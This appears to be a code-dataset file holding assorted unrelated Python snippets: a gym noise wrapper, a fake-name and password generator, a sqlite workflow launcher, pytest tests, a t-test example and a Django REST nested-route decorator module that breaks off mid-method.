| StarcoderdataPython |
3203734 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "<NAME>"
import gym
import numpy
from gym.spaces.box import Box
__all__ = ["NoisyWrapper"]
class NoisyWrapper(gym.ObservationWrapper):
    """Embed observations in a larger square frame filled with random noise.

    Each observation is copied into the top-left corner of a bigger image
    whose remaining pixels are resampled uniformly at random on every call,
    making the observation dynamic. The bottom ``bottom_margin`` rows of the
    original frame are cropped away (the Doom HUD area is useless).
    """

    def __init__(self, env=None, percent_pad=5, bottom_margin=20):
        """
        # doom 20px bottom is useless
        :param env: environment to wrap. NOTE(review): this reads
            ``env.space.shape``, but gym environments normally expose
            ``observation_space`` -- confirm the wrapped env really
            provides a ``space`` attribute.
        :param percent_pad: percent of the new side length used as padding.
        :param bottom_margin: rows cropped from the bottom of the frame."""
        super().__init__(env)
        self.original_shape = env.space.shape
        # Enlarge the longest spatial side so the original frame occupies
        # (100 - percent_pad)% of the new square side.
        new_side = int(round(max(self.original_shape[:-1]) * 100.0 / (100.0 - percent_pad)))
        self.new_shape = [new_side, new_side, 3]
        self.observation_space = Box(0.0, 255.0, self.new_shape)
        self.bottom_margin = bottom_margin
        self.ob = None  # last padded observation (see commented render below)

    def _observation(self, obs) -> numpy.ndarray:
        # Fresh uniform noise each call; the cropped original frame is then
        # pasted into the top-left corner.
        im_noise = numpy.random.randint(0, 256, self.new_shape).astype(obs.dtype)
        im_noise[: self.original_shape[0] - self.bottom_margin, : self.original_shape[1], :] = obs[
            : -self.bottom_margin, :, :
        ]
        self.ob = im_noise
        return im_noise

    # def render(self, mode='human', close=False):
    #     temp = self.env.render(mode, close)
    #     return self.ob
| StarcoderdataPython |
1822258 | <gh_stars>1-10
import random
import string
# 26-element tuples of single-character strings (note: these are tuples, not
# strings, and they are shadowed by identical locals inside address()).
lowercase = "a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"
uppercase = "A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
def firstName():
    """Return a random first name drawn from a fixed pool.

    Bug fix: a missing comma between 'Phukwane' and 'Gonzalez' caused
    implicit string concatenation, so the pool contained the bogus name
    'PhukwaneGonzalez' and neither real name could ever be returned.
    """
    names = ('Alexia','Alacia', 'Jordan','John','Andy','Joe','Caroline','Jennifer','Olivia','Anthony','Karen','Linda',
             'Michael','Emanuel','Tiffany','Ashley','Asha','Tony','James','Steffany','Bryan','Ryan', 'Chelsea','Mariah'
             ,'Mariah','Jerrica','Erica','Jerry','Nicole','Arianna','Aria','Rick','Samantha','Samuel','Joseph','Josalyn'
             ,'Darell','Daryl','Matthew','Marcus','Randell','Tyler','Terry','India','Jacob','Benjamin','Ben','Martha',
             'Jayden','Madison','Julian','Hunter','Cameron','Adrian','Evan','Micah','Jasmine','Cierra','Trent','Treya',
             'Xavier','Renee','Paris','Julia','Tory','Lilly','Hannah','Ana','Annah','Martina','Martin','Glenroy',
             'Larry','Jordynn','Toni','Bria','Briana','Bre','Sam','Darylynn','Daria','Jane','Jade','Jae','Ava','Julia',
             'Julie','Eva','Angelina','Adam','Amanda','Ali','Alyssa','Aadi','Katelyn','Peyton','Zahara','Raquel','Chloe',
             'Claire','Charlotte','Carlos','Caleb','Charles','Casey','Charlie','Cabal','Cabe','Cabernet','Daisy',
             'Darren','Diego','Dawn','Daniella','Dick','Damian','Demetria','Ellie','Ethan','Edward','Ezra','Elias',
             'Jaedynn','Camerynn','Abraham','Sean','Eric','Stanley','Markell','Juwann','Mohamad','Curt','Kristian',
             'Lilly','Kayla','Tiffany','Tisha','Tish','Rebecca','Katie','Denisse','Denise','Valerie','Trisha','Melissa',
             'Kim','Kimberly','Sabrina','Tristan','Keenan','Kell','Kristi','Kristan','Kristyn','Kate','Katelyn','Katie',
             'Cheryl','Hart','Valerie','Valorie','Nikki','Cierra','Charlie','Queen','Allen','Kim','Cheryl','Cherlyn',
             'Camal','Kent','Jana','Janet','Janette','Jeanette','Vitaly','Bishop','Sherri','Lori','Gloria','Angela'
             ,'Angie','Angel','Esmeralda','Cindy','Jamie','Steph','Stephanie','Shannon','Ken','Kenn','Aevin','Phukwane',
             'Gonzalez',"Curtis","Leonel","Leo","Leonardo","Ronaldo","Benjamin","Kelsi","Sam","Samantha","Felisha",
             "Kaylin","Jalen","Jaylin","Bradly","Brad","Bradford")
    return random.choice(names)
def lastName():
    """Return a random surname drawn from a fixed pool."""
    names=('Johnson','Smith','Williams','Thompson','Friday','Lynch','Baker','Stout','Scott','Tuesday','Perez','Lopez'
           ,'Bryant','Love','Khalid','McKnight','McCurdy','McDonald','Donaldson','Jeffries','Henderson','Wilson',
           'Williams','Brown','Kelly','Turner','Hiotte','Taylor','Mitchell','Burns','Wilson','Avery','Madison','Ryan',
           'Riley','Adison','Parker','Taylor','Stevans','Cape','Lampoe','Austin','Knowles','Curry','Jackson','Hardaway'
           ,'Carson','Reagon','Kai','Kade','Jade','Morgon','Jude','Reese','Dakota','Paxton','Zane','Cane','Janne',
           'Dallas','Skyler','Addison','Cole','Snead','Cook','Purdy','Reid','Ellis','Lane','Laww','Wilkerson',
           'Justice','Notty','Brown','Davis','Miller','Schwartz','McDylan','Morrison','Klein','Mendoza','Sherman',
           'Lawson','Barry','Costa','Nash','Forbes','Jacobs','Duncan','Levine','Hodge','Barry','Wall', 'Figuero',
           'Mendoza','Hancock','Mata','Werner','Stokes','Mccormick','Winters','Mckee','Werner','Costa','Chang',
           'Molina','Huff','Henson','Crane','Wu','Cowan','Hubbard','Rodgers','Berg','Le','Mclean','Porter','Yang',
           'Waller','Limon','Stoute','Stringer','White','Brown','Pepper','Melton','Benson','Camble','Campbell','Bell',
           'Camps','Brenneman','Ramirez','Valdez','Naughtty','Perry','Hill','Carter','Brady','Simpson','Winston',
           'Bishops','Wright','Andriano','Lorell','Ming','Mindingall','Walker','Rousey','Witiker','Bates','Sail',
           'Salles','Small','Smalls','Tate','Tait','Belton','Melton','Nowitski','WerrParker','Miller','Hansen','White',
           'Moore','Nelson','Reade','Read','Reid','Macton','Mixon','Maxton','Mosley','Alpers')
    lastName = random.choice(names)
    return lastName
def address():
    # TODO: unimplemented stub -- currently always returns None.
    # NOTE(review): these locals shadow the identical module-level tuples
    # and are never used.
    lowercase = "a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"
    uppercase = "A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"
    return
def password():
    """Generate a random alphanumeric password of length 12-16.

    Security fix: uses the ``secrets`` module (CSPRNG) instead of
    ``random``, whose Mersenne Twister output is predictable and unsuitable
    for security-sensitive values.
    """
    import secrets  # stdlib; imported locally to leave module imports untouched
    chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
    size = 12 + secrets.randbelow(5)  # uniform over [12, 16]
    return ''.join(secrets.choice(chars) for _ in range(size))
| StarcoderdataPython |
1801424 | <reponame>a-shah8/LeetCode
class Solution:
    def maxDepth(self, s: str) -> int:
        """Return the maximum nesting depth of parentheses in *s*."""
        depth = 0
        deepest = 0
        for ch in s:
            if ch == '(':
                depth += 1
                if depth > deepest:
                    deepest = depth
            elif ch == ')':
                depth -= 1
        return deepest
| StarcoderdataPython |
# NOTE: this is a docstring-style example transcript; it assumes
# ``import numpy as np`` has already been executed.
# From Dalgaard page 83 [R755c9bae090e-1]_, suppose the daily energy intake for 11
# women in kilojoules (kJ) is:
intake = np.array([5260., 5470, 5640, 6180, 6390, 6515, 6805, 7515, \
                   7515, 8230, 8770])
# Does their energy intake deviate systematically from the recommended
# value of 7725 kJ? Our null hypothesis will be the absence of deviation,
# and the alternate hypothesis will be the presence of an effect that could be
# either positive or negative, hence making our test 2-tailed.
# Because we are estimating the mean and we have N=11 values in our sample,
# we have N-1=10 degrees of freedom. We set our significance level to 95% and
# compute the t statistic using the empirical mean and empirical standard
# deviation of our intake. We use a ddof of 1 to base the computation of our
# empirical standard deviation on an unbiased estimate of the variance (note:
# the final estimate is not unbiased due to the concave nature of the square
# root).
np.mean(intake)
# 6753.636363636364
intake.std(ddof=1)
# 1142.1232221373727
t = (np.mean(intake)-7725)/(intake.std(ddof=1)/np.sqrt(len(intake)))
t
# -2.8207540608310198
# We draw 1000000 samples from Student's t distribution with the adequate
# degrees of freedom.
import matplotlib.pyplot as plt
s = np.random.standard_t(10, size=1000000)
h = plt.hist(s, bins=100, density=True)
# Does our t statistic land in one of the two critical regions found at
# both tails of the distribution?
np.sum(np.abs(t) < np.abs(s)) / float(len(s))
# 0.018318  #random < 0.05, statistic is in critical region
# The probability value for this 2-tailed test is about 1.83%, which is
# lower than the 5% pre-determined significance threshold.
# Therefore, the probability of observing values as extreme as our intake
# conditionally on the null hypothesis being true is too low, and we reject
# the null hypothesis of no deviation.
3595381 | <reponame>jorasdf24/workflow-manager<filename>Workflow-manager.py<gh_stars>1-10
import os
import sys
import time
import sqlite3
import urllib.request as req
import urllib.parse as p
def is_valid_url(url):
    """Return True if *url* can be opened successfully, False otherwise.

    Note: performs a real network request; any failure (malformed URL, DNS
    error, HTTP error status, timeout) yields False.

    Fixes: bare ``except:`` clauses (which swallowed KeyboardInterrupt and
    SystemExit) replaced with ``except Exception``, and the response is now
    closed via a context manager instead of being leaked.
    """
    try:
        with req.urlopen(req.Request(url)):
            return True
    except Exception:
        return False
def is_valid_path(path):
    """Return True when *path* names an existing file or directory."""
    exists = os.path.exists(path)
    return exists
def get_paths_based_workflow(cursor, workflow_name):
    """Return the list of paths stored under *workflow_name*.

    Takes a sqlite3 cursor and the workflow name; returns the matching
    ``path`` column values in row order (empty list when none match).
    """
    rows = cursor.execute(
        "SELECT path FROM workflows WHERE workflow_name=?;", (workflow_name,))
    return [row[0] for row in rows]
def get_workflow_list(cursor):
    """Return all workflow names in the DB (one entry per stored row).

    Bug fix: the original stringified each row tuple and then deleted every
    '(', ')', ',' and "'" character to "clean" it, which silently corrupted
    any workflow name containing those characters (e.g. "Bob's flow" became
    "Bobs flow"). Rows are tuples -- index them instead.
    """
    return [row[0] for row in
            cursor.execute("SELECT workflow_name FROM workflows;")]
def open_paths_from_workflow(cursor, workflow_name):
    """Launch every path stored under *workflow_name*.

    Prints an error line for each path that fails to open, a notice when
    the workflow does not exist, and "Enjoy" otherwise.

    Security fix: the original built the SQL by string concatenation, which
    breaks on names containing quotes and permits SQL injection; a
    parameterized query is used instead.
    """
    is_workflow_exist = False
    for path in cursor.execute(
            "SELECT path FROM workflows WHERE workflow_name = ?;",
            (workflow_name,)):
        # There is at least one path
        is_workflow_exist = True
        try:
            # Start the path (os.startfile is Windows-only)
            os.startfile(path[0])
            time.sleep(0.1)
        except Exception:
            print("Error opening file: " + str(path[0]))
    if not is_workflow_exist:
        print("This workflow does not exist...")
    else:
        print("Enjoy")
def print_menu():
    """Print the main menu options, one per line."""
    options = (
        "\n1 - Start workflow",
        "2 - Create new workflow",
        "3 - Edit workflow",
        "4 - Delete workflow",
        "5 - Print workflows",
        "6 - Exit",
    )
    for line in options:
        print(line)
def print_menu2():
    """Print the workflow-edit sub-menu, one option per line."""
    options = (
        "\n\t1 - Change workflow name",
        "\t2 - Add path",
        "\t3 - Delete Path",
        "\t4 - Exit edit",
    )
    for line in options:
        print(line)
def workflow_exists(data_base, workflow_name):
    """Return True when at least one row exists for *workflow_name*."""
    rows = data_base.execute(
        "SELECT path FROM workflows WHERE workflow_name = ?;",
        (workflow_name,))
    return any(True for _ in rows)
def path_exists(data_base, workflow_name, path):
    """Return True when *path* is already stored under *workflow_name*.

    Security fix: the original concatenated both values straight into the
    SQL string, which crashed on values containing quotes and allowed SQL
    injection; a parameterized query is used instead.
    """
    query = ("SELECT workflow_name, path FROM workflows "
             "WHERE workflow_name = ? and path = ?;")
    for _ in data_base.execute(query, (workflow_name, path)):
        return True
    return False
def main():
    """Interactive menu loop for creating, editing, deleting and launching workflows.

    Bug fixes relative to the original:
    - menu choices were compared with ``is`` (string identity), which only
      worked by CPython small-string interning; all comparisons now use ``==``.
    - the UPDATE/DELETE/SELECT statements built by string concatenation are
      parameterized, so names/paths containing quotes work and SQL injection
      is closed.
    - the bare ``except`` around CREATE TABLE is narrowed to the error sqlite
      actually raises when the table already exists.
    """
    # Connect to the DB; the file is created on first run.
    connection = sqlite3.connect('workflows.db')
    # The cursor used for executing SQL commands throughout.
    data_base = connection.cursor()
    # Declare the schema if the DB was just created.
    try:
        data_base.execute("CREATE TABLE workflows(workflow_name text, path text);")
    except sqlite3.OperationalError:
        # Table already exists.
        pass
    run = True
    while run:
        workflow_list_name = get_workflow_list(data_base)
        print_menu()
        menu_choose = str(input("Enter your choice: "))
        # Shortcut: typing a workflow name directly launches it.
        if menu_choose in workflow_list_name:
            open_paths_from_workflow(data_base, menu_choose)
            run = False
        # Start workflow
        if menu_choose == "1":
            workflow_name = str(input("Which workflow do you want to start? "))
            is_workflow_exist = False
            # Iterate through each stored path for the requested workflow.
            for path in data_base.execute("SELECT path FROM workflows WHERE workflow_name = ?;", (workflow_name,)):
                try:
                    # Start the path with the OS default opener.
                    os.startfile(path[0])
                    time.sleep(0.1)
                except Exception:
                    print("Error opening file: " + str(path[0]))
                # There is at least one path.
                is_workflow_exist = True
            if not is_workflow_exist:
                print("This workflow does not exist...")
            else:
                print("Enjoy")
            run = False
        # New workflow
        elif menu_choose == "2":
            valid_path = []
            workflow_name = str(input("Enter a name for this workflow: "))
            # The requested name must not already be in use.
            if workflow_exists(data_base, workflow_name):
                print("There's already a workflow with this name!")
            # The name must not be empty either.
            elif workflow_name == '':
                print("Empty name?")
            else:
                print("Enter the paths of your desired things to be open. Enter -1 to close and save this workflow")
                print('')
                path = ""
                counter = 1
                while path != "-1":
                    path = str(input("Enter path number " + str(counter) + ": "))
                    # Accept only valid paths/URLs that are not stored yet.
                    # (Kept as `is False` to preserve the original semantics
                    # for validators returning non-bool falsy values.)
                    if (is_valid_path(path) or is_valid_url(path)) is False or path_exists(data_base, workflow_name, path):
                        if path != "-1":
                            print("Path either already exists or is invalid!")
                            valid_path.append(False)
                    else:
                        # Insert the values for the new workflow.
                        data_base.execute("INSERT INTO workflows VALUES (?,?);", (workflow_name, path))
                        print("Path saved")
                        valid_path.append(True)
                    counter += 1
                # Save changes
                connection.commit()
                if True in valid_path:
                    print(workflow_name + " workflow saved successfully!")
                else:
                    print("Workflow wasn't saved")
        # Edit workflow
        elif menu_choose == "3":
            run2 = True
            workflow_name = str(input("Which workflow do you want to edit? "))
            if workflow_exists(data_base, workflow_name):
                while run2:
                    print_menu2()
                    edit_choose = str(input("\tEnter your choice: "))
                    # Change workflow name
                    if edit_choose == "1":
                        new_workflow_name = str(input("\tEnter new workflow name: "))
                        data_base.execute(
                            "UPDATE workflows SET workflow_name = ? WHERE workflow_name = ?;",
                            (new_workflow_name, workflow_name))
                        # Save changes
                        connection.commit()
                        workflow_name = new_workflow_name
                        print("\tName changed!")
                    # Add a path to the workflow
                    elif edit_choose == "2":
                        path = str(input("\tEnter the path of your desired thing to be open: "))
                        if (is_valid_path(path) or is_valid_url(path)) is True and not path_exists(data_base, workflow_name, path):
                            data_base.execute("INSERT INTO workflows VALUES (?,?);", (workflow_name, path))
                            connection.commit()
                            print("\tPath added!")
                        else:
                            print("\tPath either already exists or is invalid!")
                    # Delete a path in the workflow
                    elif edit_choose == "3":
                        print("\tEnter path to delete: ")
                        # List the stored paths with a number-based chooser.
                        path_list = get_paths_based_workflow(data_base, workflow_name)
                        path_number_dict = {}
                        for i, candidate in enumerate(path_list, start=1):
                            print("\t" + str(i) + " - " + str(candidate))
                            path_number_dict[str(i)] = candidate
                        number_input = str(input("\t"))
                        # Unknown selection maps to "" and fails the check below.
                        path = path_number_dict.get(number_input, "")
                        if path_exists(data_base, workflow_name, path):
                            data_base.execute(
                                "DELETE FROM workflows WHERE workflow_name = ? AND path = ?;",
                                (workflow_name, path))
                            connection.commit()
                            print("\tPath/URL deleted!")
                        else:
                            print("\tPath doesn't exist!")
                    # Exit to Main Menu
                    elif edit_choose == "4":
                        print("\tChanges saved!")
                        run2 = False
            else:
                print("This workflow does not exist...")
        # Delete workflow
        elif menu_choose == "4":
            print("Which workflow do you want to delete?")
            workflow_name = str(input())
            # Check that the workflow exists before deleting.
            if workflow_exists(data_base, workflow_name):
                data_base.execute("DELETE FROM workflows WHERE workflow_name = ?;", (workflow_name,))
                # Save changes to prevent loss.
                connection.commit()
                print("Workflow deleted successfully!")
            else:
                print("This workflow does not exist...")
        # Print workflows
        elif menu_choose == "5":
            workflows_dict = {}
            # Group paths by workflow name in a single pass.
            for name, wf_path in data_base.execute("SELECT workflow_name, path FROM workflows;"):
                workflows_dict.setdefault(name, []).append(wf_path)
            if workflows_dict:
                print("We found these workflows:")
                print('')
            else:
                print("No workflows were created!")
            # Print the grouped data.
            for key, value in workflows_dict.items():
                print("Name: " + key)
                for i, stored_path in enumerate(value):
                    if i == 0:
                        print("Paths: " + stored_path)
                    else:
                        print(" " + stored_path)
                print('')
        # Exit the program
        elif menu_choose == "6":
            print("See you later!")
            run = False
    # Save (commit) the changes and close the connection with the DB.
    connection.commit()
    connection.close()
if __name__ == "__main__":
main() | StarcoderdataPython |
1771175 | <filename>tests/util/py/decorators_test.py
# Copyright 2014-2020 <NAME> <<EMAIL>>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for //labm8/py:decorators.py."""
import time
import pytest
from programl.util.py import decorators
from tests.test_main import main
class DummyClass(object):
    """Test fixture exposing a memoized property plus an evaluation counter."""

    def __init__(self):
        # Number of times the memoized_property body has actually executed.
        self.memoized_property_run_count = 0

    @decorators.memoized_property
    def memoized_property(self):
        """Return a constant while counting how many times the body runs."""
        self.memoized_property_run_count += 1
        # In "real world" usage, this would be an expensive computation whose
        # result we would like to memoize.
        return 5
def test_memoized_property_value():
    """The memoized property should evaluate to the expected constant."""
    instance = DummyClass()
    assert instance.memoized_property == 5
def test_memoized_property_run_count():
    """Repeated reads must hit the cache so the body runs exactly once."""
    instance = DummyClass()
    for _ in range(3):
        _ = instance.memoized_property
    assert instance.memoized_property_run_count == 1
def test_timeout_timeout_not_raised():
    """A fast function wrapped by the timeout decorator returns normally."""
    @decorators.timeout(seconds=1)
    def quick() -> int:
        """Returns immediately, well inside the deadline."""
        return 5

    assert quick() == 5
def test_timeout_timeout_raised():
    """A function that overruns its deadline raises TimeoutError."""
    @decorators.timeout(seconds=1)
    def slow() -> int:
        """Sleeps far past the one-second deadline."""
        time.sleep(10)
        return 5

    with pytest.raises(TimeoutError):
        slow()
# Script entry point: delegate to the shared test runner.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
4996216 | <reponame>kitawarairon/curso-pyton-engenharia
import time
from intermediario.Clientes import Cliente
from intermediario.Contas import Conta, ContaEspecial
from intermediario.Bancos import Banco
# Sample customers — the arguments look like (name, phone, document number);
# confirm the exact meaning against the Cliente class in intermediario/Clientes.py.
pedro = Cliente('pedro', '77445588', '33344466678')
maria = Cliente('maria', '99885533', '11111111111')
polly = Cliente('pollyana', '99885533', '11111111111')
# Accounts for each customer; ContaEspecial takes an extra third argument
# (presumably an overdraft limit — verify in intermediario/Contas.py).
conta_pedro = Conta(pedro, 500)
conta_maria = Conta(maria, 5000)
conta_polly = ContaEspecial(polly, 2500, 500)
# Create the bank (name, code) and register the three accounts.
banco_python = Banco('banco python', '003')
banco_python.abrir_conta(conta_pedro)
banco_python.abrir_conta(conta_polly)
banco_python.abrir_conta(conta_maria)
# Show the registered accounts and the bank's own representation.
banco_python.lista_contas()
print(banco_python)
| StarcoderdataPython |
1622040 | <gh_stars>1-10
import pytest
from wyrd.constrained_types import (
UnmetConstraintError,
ConstrainedFloat,
add_constraint,
)
@add_constraint(lambda x: x == 3.0, "Pi is exactly 3")
class PiNumber(ConstrainedFloat):
    """Constrained float accepting only the exact value 3.0."""

    pass
@add_constraint(lambda x: x >= 1.5, "must be greater than or equal to 1.5")
@add_constraint(lambda x: x <= 10, "must be less than or equal to 9.5")
class OneIshToTenIsh(ConstrainedFloat):
    """Constrained float limited to the closed range [1.5, 10].

    NOTE(review): the upper-bound error message says "9.5" while the
    predicate allows values up to 10; the tests below pin the "9.5"
    wording, so confirm which is intended before changing either.
    """

    pass
def test_its_equal_to_a_float():
    """A ConstrainedFloat compares equal to the underlying float value."""
    value = 3.14159
    assert ConstrainedFloat(value) == value
def test_it_sums_like_a_float():
    """Adding two ConstrainedFloat values behaves like float addition."""
    total = ConstrainedFloat(5.0) + ConstrainedFloat(1.5)
    assert total == ConstrainedFloat(6.5)
@pytest.mark.parametrize(
    "cls,value",
    [(PiNumber, 3), (OneIshToTenIsh, 6.2)],
)
def test_if_a_constraint_is_defined_and_valid_everything_works(cls, value):
    """Constructing with a value satisfying every constraint must succeed."""
    assert cls(value) == value
@pytest.mark.parametrize(
    "cls,value,expected_error",
    [
        (PiNumber, 4, "Pi is exactly 3"),
        (OneIshToTenIsh, 0.3, "must be greater than or equal to 1.5"),
        (OneIshToTenIsh, 10.2, "must be less than or equal to 9.5"),
    ],
)
def test_if_a_constraint_isnt_met_on_construction_an_exception_is_raised(
    cls, value, expected_error
):
    """Constructing with an out-of-range value raises UnmetConstraintError
    carrying the exact message of the violated constraint."""
    with pytest.raises(UnmetConstraintError) as err:
        cls(value)
    assert str(err.value) == expected_error
| StarcoderdataPython |
9621239 | """
Module for CAS communication using the bottle framework
"""
from client import CASClient, CASMiddleware
| StarcoderdataPython |
3396862 | # pylint: disable=protected-access
from collections import OrderedDict
from inspect import getmembers
from rest_framework.decorators import action
from rest_framework import viewsets as vsets
from ..exceptions import VSTUtilsException
def __get_nested_path(name, arg=None, arg_regexp='[0-9]', empty_arg=True):
    """Build the URL sub-path for a nested route.

    With no ``arg`` the path is just ``name``; otherwise an optional
    named capture group for the nested id is appended. ``empty_arg``
    selects ``*`` (id may be empty) vs ``+`` (id required).
    """
    if not arg:
        return name
    quantifier = '*' if empty_arg else '+'
    return '{0}/?(?P<{1}>{2}{3})'.format(name, arg, arg_regexp, quantifier)
def __get_nested_subpath(*args, **kwargs):
    """Like ``__get_nested_path`` but optionally appends ``sub_path``."""
    sub_path = kwargs.pop('sub_path', None)
    base = __get_nested_path(*args, **kwargs)
    if not sub_path:
        return base
    return base + '/' + sub_path
def nested_action(name, arg=None, methods=None, manager_name=None, *args, **kwargs):
    """Build a DRF ``@action`` decorator exposing ``name`` as a nested route.

    ``arg`` names the URL keyword capturing the nested object id; when it is
    ``None`` the route behaves like a list endpoint (GET/POST-style methods).
    The wrapped view function is invoked with nested-context attributes set
    on the view instance (``nested_name``, ``nested_parent_object``, …).
    """
    # pylint: disable=too-many-locals
    list_methods = ['get', 'head', 'options', 'post']
    detail_methods = ['get', 'head', 'options', 'put', 'patch', 'delete']
    # Default HTTP methods depend on whether this is a detail route.
    methods = methods or (detail_methods if arg else list_methods)
    arg_regexp = kwargs.pop('arg_regexp', '[0-9]')
    empty_arg = kwargs.pop('empty_arg', True)
    request_arg = kwargs.pop('request_arg', '{}_{}'.format(name, arg))
    # List routes have no id keyword at all.
    request_arg = request_arg if arg else None
    append_arg = kwargs.pop('append_arg', arg)
    sub_options = kwargs.pop('sub_opts', dict())
    path = __get_nested_subpath(name, request_arg, arg_regexp, empty_arg, **sub_options)
    allow_append = bool(kwargs.pop('allow_append', False))
    manager_name = manager_name or name
    _nested_args = kwargs.pop('_nested_args', OrderedDict())
    _nested_filter_class = kwargs.pop('filter_class', None)

    def decorator(func):
        def wrapper(view, request, *args, **kwargs):
            # Nested name
            view.nested_name = name
            # Nested parent object
            view.nested_parent_object = view.get_object()
            # Allow append to nested or only create
            view.nested_allow_append = allow_append
            # ID name of nested object
            view.nested_arg = request_arg
            view.nested_append_arg = append_arg
            view.nested_id = kwargs.get(view.nested_arg, None)
            # Related manager on the parent providing the nested queryset.
            view.nested_manager = getattr(
                view.nested_parent_object, manager_name or name, None
            )
            view.nested_view_object = None
            view._nested_filter_class = _nested_filter_class
            return func(view, request, *args)
        wrapper.__name__ = func.__name__
        kwargs['methods'] = methods
        kwargs['detail'] = True
        kwargs['url_path'] = path
        kwargs['url_name'] = kwargs.pop('url_name', name)
        # Register the wrapper as a DRF extra action, then attach the
        # nested metadata that nested_view.setup() reads later.
        view = action(*args, **kwargs)(wrapper)
        view._nested_args = _nested_args
        view._nested_manager = manager_name or name
        view._nested_filter_class = _nested_filter_class
        if arg:
            view._nested_args[name] = request_arg
        return view
    return decorator
class BaseClassDecorator(object):
    """Base for class decorators that attach nested routes to a view class.

    Subclasses implement :meth:`setup`, which mutates and returns the
    decorated view class.
    """

    def __init__(self, name, arg, *args, **kwargs):
        # Route name and the URL keyword argument used for nested ids.
        self.name = name
        self.arg = arg
        self.request_arg = kwargs.pop('request_arg', '{}_{}'.format(self.name, self.arg))
        # Remaining positional/keyword options are forwarded by subclasses.
        self.args = args
        self.kwargs = kwargs

    def setup(self, view_class):  # nocv
        """Subclass hook: modify and return ``view_class``."""
        raise NotImplementedError()

    def __call__(self, view_class):
        return self.decorator(view_class)

    def decorator(self, view_class):
        return self.setup(view_class)
class nested_view(BaseClassDecorator):  # pylint: disable=invalid-name
    """Class decorator mounting another viewset as nested routes on a view.

    Generates list/detail endpoints (and the nested view's own extra
    actions, filtered by ``subs``) under the decorated view's URL, using
    :func:`nested_action` for each route.
    """

    # Extra-action names that must never be exposed as nested subs.
    filter_subs = ['filter',]

    class NoView(VSTUtilsException):
        msg = 'Argument "view" must be installed for `nested_view` decorator.'

    def __init__(self, name, arg=None, methods=None, *args, **kwargs):
        self.view = kwargs.pop('view', None)
        self.allowed_subs = kwargs.pop('subs', [])
        super(nested_view, self).__init__(name, arg, *args, **kwargs)
        self._subs = self.get_subs()
        if self.view is None:
            raise self.NoView()
        self.serializers = self.__get_serializers(kwargs)
        self.methods = methods
        if self.arg is None:
            # No id argument: list-style route, default to GET only.
            self.methods = methods or ['get']
        self.kwargs['empty_arg'] = self.kwargs.pop('empty_arg', False)
        self.kwargs['append_arg'] = self.arg
        self.kwargs['request_arg'] = self.request_arg

    def __get_serializers(self, kwargs):
        """Return (list serializer, detail serializer) for the nested view."""
        serializer_class = kwargs.pop('serializer_class', self.view.serializer_class)
        serializer_class_one = kwargs.pop(
            'serializer_class_one', getattr(self.view, 'serializer_class_one', None)
        ) or serializer_class
        return (serializer_class, serializer_class_one)

    def _get_subs_from_view(self):
        """Collect the nested view's extra-action names (minus filter_subs)."""
        # pylint: disable=protected-access
        return [
            name for name, _ in getmembers(self.view, vsets._is_extra_action)
            if name not in self.filter_subs
        ]

    def get_subs(self):
        """Apply the ``subs`` whitelist: None disables all, a list filters."""
        subs = self._get_subs_from_view()
        if self.allowed_subs is None:
            return []
        elif self.allowed_subs:
            subs = [sub for sub in subs if sub in self.allowed_subs]
        return subs

    @property
    def serializer(self):
        # Serializer used for list endpoints.
        return self.serializers[0]

    @property
    def serializer_one(self):
        # Serializer used for detail endpoints.
        return self.serializers[-1]

    def get_view(self, name, **options):
        """Create a dispatch function named ``name`` delegating to the nested view."""
        # pylint: disable=redefined-outer-name
        def nested_view(view_obj, request, *args, **kwargs):
            kwargs.update(options)

            # Subclass per request so __doc__/__name__ mirror the nested view.
            class NestedView(self.view):
                __doc__ = self.view.__doc__

            NestedView.__name__ = self.view.__name__
            return view_obj.dispatch_nested_view(NestedView, request, *args, **kwargs)
        nested_view.__name__ = name
        nested_view.__doc__ = self.view.__doc__
        nested_view._nested_view = self.view
        return name, nested_view

    def get_list_view(self, **options):
        return self.get_view('{}_list'.format(self.name), **options)

    def get_detail_view(self, **options):
        return self.get_view('{}_detail'.format(self.name), **options)

    def get_sub_view(self, sub, **options):
        return self.get_view('{}_{}'.format(self.name, sub), nested_sub=sub, **options)

    def get_decorator(self, detail=False, **options):
        """Build the nested_action decorator for a list or detail route."""
        args = [self.name]
        args += [self.arg] if detail else []
        args += self.args
        kwargs = dict(self.kwargs)
        kwargs['methods'] = self.methods
        kwargs['serializer_class'] = self.serializer_one if detail else self.serializer
        kwargs['filter_class'] = getattr(self.view, 'filter_class', [])
        kwargs.update(options)
        return nested_action(*args, **kwargs)

    def decorated_list(self):
        """Return (attr name, decorated list endpoint)."""
        name, view = self.get_list_view()
        return name, self.get_decorator(
            url_name='{}-list'.format(self.name), suffix='List'
        )(view)

    def decorated_detail(self):
        """Return (attr name, decorated detail endpoint)."""
        name, view = self.get_detail_view()
        return name, self.get_decorator(
            True, url_name='{}-detail'.format(self.name)
        )(view)

    def _get_decorated_sub(self, sub):
        """Return (attr name, decorated endpoint) for one nested extra action."""
        name, subaction_view = self.get_sub_view(sub)
        sub_view = getattr(self.view, sub)
        sub_path = sub_view.url_path
        decorator = self.get_decorator(
            detail=sub_view.detail,
            sub_opts=dict(sub_path=sub_path),
            methods=sub_view.bind_to_methods or self.methods,
            serializer_class=sub_view.kwargs.get('serializer_class', self.serializer),
            url_name='{}-{}'.format(self.name, sub_view.url_name),
            _nested_args=getattr(sub_view, '_nested_args', OrderedDict())
        )
        return name, decorator(subaction_view)

    def generate_decorated_subs(self):
        for sub in self._subs:
            yield self._get_decorated_sub(sub)

    def setup(self, view_class):
        """Attach detail, sub and list endpoints to ``view_class`` and return it."""
        if self.arg:
            setattr(view_class, *self.decorated_detail())
